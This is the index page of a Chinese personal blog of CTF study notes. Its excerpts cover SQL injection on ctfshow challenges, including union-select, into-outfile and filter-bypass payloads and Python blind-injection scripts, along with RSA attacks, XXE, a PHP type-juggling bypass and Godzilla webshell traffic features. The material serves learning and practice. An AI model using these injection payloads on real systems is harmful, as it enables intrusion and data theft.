自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(61)
  • 收藏
  • 关注

原创 【流量分析】Godzilla分析

哥斯拉客户端使用JAVA语言编写,在默认的情况下,如果不修改User-Agent,User-Agent会类似于Java/1.8.0_121(具体什么版本取决于JDK环境版本)。但是哥斯拉支持自定义HTTP头部,这个默认特征是可以很容易去除的。Accept为text/html, image/gif, image/jpeg, *;q=.2, /;q=.2哥斯拉的作者应该还没有意识到,在请求包的Cookie中有一个非常致命的特征,最后的分号。

2023-08-29 18:18:41 7181 1

原创 445端口访问“”

项目场景:smb445端口访问告警问题描述:杀毒重装后也是一直有告警存在原因分析:提示:这里填写问题的分析:例如:Handler 发送消息有两种方式,分别是 Handler.obtainMessage()和 Handler.sendMessage(),其中 obtainMessage 方式当数据量过大时,由于 MessageQuene 大小也有限,所以当 message 处理不及时时,会造成先传的数据被覆盖,进而导致数据丢失。解决方案:提示:这里填写该问题的具体解决方案:例如:新建一个

2021-07-27 11:22:17 605

原创 176-183

1.大小过滤 176union Unionselect Select2.空格 177/**/ 万万没想到,竟然是空格过滤有了问题,__ 这个也是空格的意思!!3.注释不对!!空格也被替换了注释不要用–+ – -用%23空格用%0a%0b%0c%0d%09unionselect __/**/--+-- -%0a%0b%0c%0d%09 ...

2021-05-30 16:34:55 163

原创 CTFshow 175 into outfile ‘/var/www/html/1.txt‘

[x00-x7f] 匹配ASCII值从0-127的字符0-127表示单字节字符,也就是:数字,英文字符,半角符号,以及某些控制字符。限制了页面不能显示任何数据,?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10就跳到这里了,真的很神奇,所以说select xxx from xxx into outfile '/var/

2021-05-23 13:16:36 339

原创 CTFshow web147 本人小白菜鸟详细思路解析

思路分析//拼接sql语句查找指定ID用户$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";题目给出的提示,表格给出来了就是ctfshow_user4,username就是flag这里按理想到的回应是1' union select 1,2,password from ctfshow_user4 where usernam

2021-05-22 23:02:31 415 5

原创 CTFshow SQL

web171——常规操作~2' and 1=1 # 2' and 1=2 #数据接口请求异常:parsererror2' and 1=1 --+回显正常,且爆出所有信息,说明“--+”其效果了 。“#”这种注释方式不成功2' union select 1,2,3 -- -成功回显1,2,3 2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=dat

2021-05-21 15:56:12 195

原创 CTFshows web7 sql注入 另一种解法,

1.爆破?id=-1/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102

2021-05-21 15:25:25 95

原创 CTFshow web7

```php# -*- coding: utf-8 -*-"""Created on Fri May 21 11:23:55 2021@author: Administrator"""import requestss=requests.session()url="http://7341d132-e805-412d-8c9e-3402d7c1e803.challenge.ctf.show:8080/index.php?id=-1'/**/"table=""for i in ran.

2021-05-21 11:35:37 428 1

原创 CTFshow8 SQL

# -*- coding: utf-8 -*-"""Created on Fri May 21 10:51:40 2021@author: Administrator"""import requestss=requests.session()url='http://1774ea69-f82e-4a6b-825c-3e0becd685ab.challenge.ctf.show:8080/index.php'table=""for i in range(1,45): print

2021-05-21 11:03:37 100

原创 PWN我要入门!!!

一.攻防世界新手区hello_pwn覆盖掉数据常规操作的两步.本地打通远程打通content=0 此时运行脚本练习本地打穿from pwn import *context(os='linux',arch="amd64",log_level="debug")content=1def main(): if content == 1: wjk=process('./hello_pwn') else: wjk = remote

2021-05-19 11:19:58 221

转载 音频题 持续更新 你的我的audacity

二、intoU难度系数: ★★★★题目来源: XCTF 3rd-RCTF-2017题目描述: I’m so into you I can barely breath.And all I wanna do is to fall in deep (IntoU歌曲歌词)题目场景: 暂无题目附件: 附件11、附件1链接:https://pan.baidu.com/s/11eNPx8Obpd3Cq-yefWxrAQ提取码:ow262、压缩包—>解压得到文件3、用“Audacity”软件打开

2021-04-28 22:11:50 275

转载 八进制 十进制 ASCII相互转换

八进制 十进制 ASCII相互转换【支持多个字符串】SCC 2019 Misc 隐藏的信息(这是一个被混淆的文件,但是我忘记了这个文件的密码。你能够帮助我还原明文吗?)就是217 2019-05-23 16:39:33 788 收藏 1分类专栏: ISCC 文章标签: 杂项 misc版权下载打开之后0126 062 0126 0163 0142 0103 0102 0153 0142 062 065 0154 0111 0121 0157 0113 0111 0105 0132 0163 0

2021-04-28 21:55:16 2176

转载 维吉尼亚 呵呵

https://blog.youkuaiyun.com/weixin_45530599/article/details/108112665?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161625156416780262520524%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=161625156416780262520524&biz_i

2021-03-20 23:13:04 109

原创 共模攻击

给了两个密文和两个密钥提取公钥信息from Crypto.PublicKey import RSAimport libnumimport gmpy2c1=libnum.s2n(open('cipher1.txt','rb').read())c2=libnum.s2n(open('cipher2.txt','rb').read())pub1=RSA.importKey(open('publickey1.pem').read())pub2=RSA.importKey(open('public

2021-03-20 22:28:12 437

原创 RSA类题目超快的解法

用私钥进行解密,于是先生成私钥:python RsaCtfTool.py --publickey ~/Desktop/key.pub --private丢到工具里去解密,注意这里的文本为未解密的base64编码:

2021-03-20 22:04:31 252

原创 工控安全取证

下载后是一个capture.log,考虑到都是流量,改成wireshark能识别的后缀,capture.pcapng然后扔进wireshark得到一大堆tcp注意到少量ICMP发起扫描多半先一个ICMP然后一堆TCP所以看看ICMP他要求第四次那应该是在155987到155990最终发现IP为192.168.0.199的ICMP的Ping请求对应的数据包编号155989为Flag...

2021-03-20 18:53:20 461

原创 safer-than-rot13 词频分析?

奇奇怪怪的文件,扔进010里面了,发现一堆英文,有的像错位了的感觉,用Captf,尝试rot13 15什么都不成句子,后面看wp说,可以用词频分析来看看,哈~还有这种的嘛?词频分析?哦哦哦,好吧https://quipqiup.com/没有网,这道题就完犊子了...

2021-03-20 18:17:43 175

转载 streamgame

看起来好像不怎么聪明的样子。key文件,老样子,拖入16进制编辑器查看:from flag import flagassert flag.startswith("flag{")assert flag.endswith("}")assert len(flag)==27#flag=flag{XXXXXXXXXXXXXXXXXXXXX}def lfsr(R,mask): output = (R << 1) & 0xffffff i=(R&

2021-03-20 17:48:41 293

原创 攻防世界 bug 越权

大家好,我又来了希望我的选择是对的 加油!看到题目先登录,嗯,,先注册一下吧,这个时候最后开着BURP因为登录类型的题目有可能是和抓包有关的,回头我们好观察每一步的HTTP头,注册之后我们得到提示!那到处点点呗~MANAGE页面说你不是admin,哦~那就是你一定要是admin才可以,好吧,你不让我干什么我就想干什么要越权了说明,这个和抓包更有关了其他页面信息很详细了这里信息这么全,很可疑的界面,我们看一下抓包的效果吧,有神么可以的?md5加密后是16位或者32位的字符,由

2021-03-20 12:32:53 238

原创 RSA已知密文和公钥

https://blog.youkuaiyun.com/qq_41137110/article/details/109060191?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161598836116780255264281%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=161598836116780255264281&biz_id=..

2021-03-18 00:43:09 6441

原创 你猜猜

嗯,,怎么讲,我已经做到呈现压缩包了,然后就是加密压缩包的问题了1.伪加密 这个用7z就可以迅速结局2.明文攻击 就一个文件怎么明文攻击3.暴力破解 之前用Advanced,今天学到了一个专门解压压缩包的 ziperello唯一不懂的就是为什么就认定是单纯的数字密码了呢?所以说弱口令???...

2021-03-17 21:38:04 98

转载 rsa低加密指数广播攻击 见到呢就得到了

嗯? 这一大串是啥东西?以前没做过这种题阿?果断看WP了;RSA低加密指数广播攻击首先介绍什么是广播,加入我们需要将一份明文进行多份加密,但是每份使用不同的密钥,密钥中的模数n不同但指数e相同且很小,我们只要拿到多份密文和对应的n就可以利用中国剩余定理进行解密。关于中国剩余定理请参考文章: Go!只要满足一下情况,我们便可以考虑使用低加密指数广播攻击:加密指数e非常小一份明文使用不同的模数n,相同的加密指数e进行多次加密可以拿到每一份加密后的密文和对应的模数n、加密指数e# coding:

2021-03-17 20:50:08 846

原创 Poem Codes 好的我记住你了

import sysimport itertoolsfrom os import listdirfrom os.path import isfile, joinabc='abcdefghijklmnopqrstuvwxyz'def loadlist(infile): tlist = [] for line in open(infile,'r'): for w in line.split(): tlist.append(w.lower()) return tlistdef encr

2021-03-17 20:38:33 307

转载 太他喵的难了根本做不出来unfinish

https://www.cnblogs.com/hackhackgo/p/13518998.htmlhttps://blog.youkuaiyun.com/hxhxhxhxx/article/details/107900247?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161589818216780265422475%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&

2021-03-16 22:49:34 111

转载 打开电动车

奇怪的波形 010101也算是可以用?????奇怪的波形啊真的是https://blog.youkuaiyun.com/weixin_44604541/article/details/111193409?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161581008616780269896413%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_

2021-03-15 21:01:50 227

转载 banana-princess

攻防世界crypto中 banana-princess这个题折腾了好久都没有思路,pdf打不开,也没有任何的提示,后来实在没辙了,找了个pdf来对比,终于有了发现:1、对比一个正常能打开的pdf和题目的pdf头,发现如下(notepad++打开的是正常的):一个是%PDF-1.7,另外一个是%CQS-1.5。形式完全一样啊,数字可以理解为版本号。那就思路来了,估计是进行了位移?尝试后发现:随便抓了一段在前面的字符,解密也可得一个看着是有意义的单词。2、通过上述描述,进行rot13解密:cat

2021-03-14 19:44:24 248

转载 sherlock

附件是一本书的内容,发现其中有些字母莫名地大写cat 文件名 | grep -Eo ‘[A-Z]’ |tr -d ‘\n’# -*- coding: utf-8 -*-import res='01000010010010010101010001010011010000110101010001000110011110110110100000110001011001000011001101011111001100010110111001011111011100000110110000110100001

2021-03-14 18:09:05 112

原创 2021-03-14

用wireshark打开pcapng文件,发现存在大量UDP流量包,大部分UDP流量包的长度相同,只有一些长度的UDP流量包仅出现过一次,猜测它们可能有异常。https://tool.lu/hexstr/

2021-03-14 17:23:57 92

原创 8钟针对图片的做法

outguess -r 035bfaa85410429495786d8ea6ecd296.jpg 1.txt1 扔进stegsolve无果2 010无果3 binwalk无果4 foremost无果5 strings无果6 zstegs无果查了查有个工具叫outguessoutguess -r 035bfaa85410429495786d8ea6ecd296.jpg 1.txt

2021-03-14 12:58:06 86

原创 pyc

saleae不会做,DISK也不会做PYC1一次是直接反编译,分析代码就可以了2翻不出来,直接探索PYC的隐写用到 stegosaurus3.好家伙,解出来一半,了解到kali中专业的反编译Uncompyle,成不成能不能输出一些有用的东西只之类的一. pyc文件逆向在命令窗口执行uncompyle6 test.pyc > test.py打开得到的test.py二. 反编译不全,用工具跑得到了一串base64的倒序反编译不全,用工具跑得到了一串base64的倒序=cWbihG

2021-03-14 12:43:31 315

原创 传感器

攻防世界 Misc高手进阶区 3分题 传感器1一、曼彻斯特以及差分曼彻斯特曼彻斯特与差分曼彻斯特曼彻斯特:从低到高是0 从高到底是1差分曼彻斯特:没变化就是0 有变化就是1二、思路:给了加密后的0x8893CA58明文:3EAAAAA56A69AA55A95995A569AA95565556(不懂为什么要去掉3E)要判断究竟用的是那种曼彻斯特算法好的从明文到密文怎么变换的呢?1.将明文去掉3E 变成16进制的一段,16进制转十进制,十进制转二进制0101的格式import reh

2021-03-13 17:05:19 226

原创 键盘密码

,在键盘上r5yg中间的字母是t,同理,将其他的也找出来,得到

2021-03-10 22:41:24 686

转载 PYC-在线反编译器 、隐写工具Stegosaurus

http://www.freebuf.com/sectool/129357.htmlStegosaurus本文将给大家介绍这款名叫Stegosaurus的隐写工具,它允许我们在Python字节码文件(pyc或pyo)中嵌入任意Payload。由于编码密度较低,因此我们嵌入Payload的过程既不会改变源代码的运行行为,也不会改变源文件的文件大小。Payload代码会被分散嵌入到字节码之中,所以类似strings这样的代码工具无法查找到实际的Payload。PYC-在线反编译器 、隐写工具 、还有一种情

2021-03-10 22:34:03 4148

转载 misc1

十六进制:0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、Fd4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1e6b3e3b9e4b3b7b7e2b6b1e4b2b6b9e2b1b1b3b3b7e6b3b3b0e3b9b3b5e6fd瞅着像16进制但直接转ascii得到一串乱码根据经验可能是偏移了128减去128看看cipher = "d4e8e1f4a0f7e1f3a0e6e1f3f

2021-03-10 21:59:57 483

原创 JASON格式与布尔绕过弱类型比较

<?phprequire_once('config.php');header('Content-Type: application/json');function response($resp){ #定义了一个函数response对变量resp进行JSON加密 die(json_encode($resp));}function response_error($msg){ #定义了一个函数response_error对变量msg出错时调用 $result = ['status'=

2021-03-10 20:56:23 549

原创 第一次研究的XXE

XXE的原理解释https://www.bilibili.com/video/BV1Hi4y147ew?from=search&seid=5986897573531513171XXE payload<?xml version="1.0" encoding="utf-8"?> ]> &goodies;解题从信息提示我们可以知道要通过编写xml文件上传即通过XXE编码转换成utf-16编码绕过我们可以利用vim编辑xml文件(取名为2.xml)构造pay

2021-03-08 21:32:02 177

原创 自学的第一篇JS题目

查看源码:<script src="script-min.js"></script> //首先调用.js脚本 <script type="text/javascript"> var ic = false; #默认ic值为false var fg = ""; function getFlag() { //

2021-03-08 20:14:40 126

原创 Normal_RSA

Normal_RSA一.认识文件一个enc文件一个是flag的密文一个是pem文件一个是公钥(pubkey)pubkey.pem倒是可以打开,里面也明确写了这是个public key,而且中间有一段base64的编码二.openssl首先我们使用openssl提取出public.pem中的相关参数openssl rsa -pubin -text -modulus -in warmup -in pubkey.pem三.N两个大素数的乘积:里面modulus就是N这里显示Mod

2021-03-08 16:54:10 358

原创 5-1异或(XOR)运算进行加密解密

在一道LOTTARY题目上卡了2个小时,结果题目系统崩了,好吧,系统o( ̄▽ ̄)d文章目录前言一、异或(XOR)运算进行加密解密二、XORTOOL1.引入库三.异或的脚本前言加解密有异或这种方式XORTOOL脚本一、异或(XOR)运算进行加密解密什么是异或运算异或运算是在二进制数中的一种按维进行计算的逻辑运算符。其真值表为:左操作数 右操作数 结果0 0 00 1 11 0 11 1 0加密过程从上面的真值表中可以看出,我们可以取右操作数(左操作数)当做加密密钥,记为key,

2021-03-07 19:53:12 4372

原创 攻防世界 web高手进阶区 favorite_number

打开后发现是一道php代码审计题1.首先是个判断,既要数组强等,又要首元素不为admin(PHP5.59的漏洞)2.做了一个正则匹配,要求字符串全为数字,大小写不敏感,跨行检测(匹配数字注意到了,如何绕过呢,跨行))3.写了一个黑名单,把常用的都排除了前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。提示:以下是本篇文章正文内容,下面案例可供参考一、php5.5.9这个版本

2021-03-07 12:18:32 364

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除